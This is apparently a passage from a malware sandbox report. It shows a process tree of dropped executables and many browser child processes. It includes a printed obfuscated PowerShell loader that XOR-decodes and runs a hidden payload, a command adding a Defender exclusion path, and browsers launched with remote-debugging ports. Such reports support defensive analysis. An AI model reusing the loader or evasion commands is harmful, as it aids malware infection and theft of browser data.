BzAEYAQQA4AG0ARQB6AEkANQBIAEMAMABrAE0AegBRADkARQBuAFUARQBLAEQARQBEAFoAQwBZAGgASgBqAFEAawBGAEIAQQArAEgAegBJADUARAB6AHcAaABKAGwAYwBBAEsAQgA4ACsARgBUADAAVABFADMAbwBKAEoAaQBjACsASwBDAGsAMgBGAHoARQA5AEYARAA0ADYASQBqAEEAdgBLAEgAUQA2AEYAdwBzAGMAQgB6AG8ASwBWADEASQB5AE8AdwBCAEoARgBRADAANQBBAHkAUQB4AE0AaABVAHkAUABSAEkAcQBFAFEAcwA1AEcAeQBZAG4ASAB4AEkAbABLAHkANAB4AEMAQwBJAGMAQQB6AEEATgBDAEMAOABsAE8AQQA4AEQAQQBEAEkATQBQAFQAbwBNAEoAaQBjAGkATwBBADkAQQBBAEQASQBEAEwAVABBAHkATgBpAFIAaQBPAEEAQQBtAFUAdwBrAE0AQgBDADAAbABOAGkAUgBzAFAAbgBSAEEAQQBEAEYAbQBFADMAbwB4AFYAdwBFAHkARgBEADQAeQBDAHcAMABUAE8AWABvAGgASQBTAE0AeQBGAHgATQBFAFgAaQBkAG0AQQAzADQASgBQAFQAYwB5AFAAQgBaAE4AVwBnAD0APQAnADsAJABmAG4AYgByAHUAegBhAD0AJwBxAEcAcABnAGgAVABVAEoAaABlAGYAVQAnADsAJABiAHEAcgBuAHkAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AHcAbABxAHMAagBkACkAOwAkAGEAeABvAGkAYgBsAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAGIAcQByAG4AeQAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHEAcgBuAHkAWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABmAG4AYgByAHUAegBhAFsAJABpACUAJABmAG4AYgByAHUAegBhAC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAeABvAGkAYgBsACkAKQB8AGkAZQB4AA==
        7⤵
        
        PID:5904
    - - C:\Users\Admin\AppData\Local\Temp\10126710101\packed.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126710101\packed.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Enumerates system info in registry
        
        PID:2596
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6948
    - - C:\Users\Admin\AppData\Local\Temp\10126720101\bncn6rv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126720101\bncn6rv.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:4196
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5136
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff9a54cc40,0x7fff9a54cc4c,0x7fff9a54cc58
        7⤵
        
        PID:5432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2244,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2240 /prefetch:2
        7⤵
        
        PID:6404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1836,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2584 /prefetch:3
        7⤵
        
        PID:4928
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2032,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2676 /prefetch:8
        7⤵
        
        PID:5752
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:6288
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:6644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4464,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5888
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4196 /prefetch:8
        7⤵
        
        PID:7060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
        7⤵
        
        PID:7012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3648,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:8
        7⤵
        
        PID:4572
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4932,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4972 /prefetch:8
        7⤵
        
        PID:7128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4456,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
        7⤵
        
        PID:5440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:8
        7⤵
        
        PID:6040
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5288 /prefetch:8
        7⤵
        
        PID:6372
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4864
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7fff92fb46f8,0x7fff92fb4708,0x7fff92fb4718
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6948
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
        7⤵
        
        PID:5400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
        7⤵
        
        PID:5660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2676 /prefetch:2
        7⤵
        
        PID:5720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 /prefetch:8
        7⤵
        
        PID:5692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2456 /prefetch:2
        7⤵
        
        PID:6048
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2468 /prefetch:2
        7⤵
        
        PID:6844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2516 /prefetch:2
        7⤵
        
        PID:6516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3692 /prefetch:2
        7⤵
        
        PID:7040
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3716 /prefetch:2
        7⤵
        
        PID:5904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4344 /prefetch:2
        7⤵
        
        PID:6700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4364 /prefetch:2
        7⤵
        
        PID:2716
    - - C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3440
      - C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:6964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7fffa184cc40,0x7fffa184cc4c,0x7fffa184cc58
        8⤵
        
        PID:6612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2324,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2320 /prefetch:2
        8⤵
        
        PID:3940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2576 /prefetch:3
        8⤵
        
        PID:3124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1788,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2716 /prefetch:8
        8⤵
        
        PID:4536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2448
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3512 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4428 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6524
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:8
        8⤵
        
        PID:1908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4288,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8
        8⤵
        
        PID:4500
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8
        8⤵
        
        PID:6196
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5268,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5276 /prefetch:8
        8⤵
        
        PID:5844
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5412,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5132 /prefetch:8
        8⤵
        
        PID:3024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4856 /prefetch:8
        8⤵
        
        PID:1224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
        8⤵
        
        PID:6492
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5532,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:8
        8⤵
        
        PID:2844
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4912,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:6316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:5720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
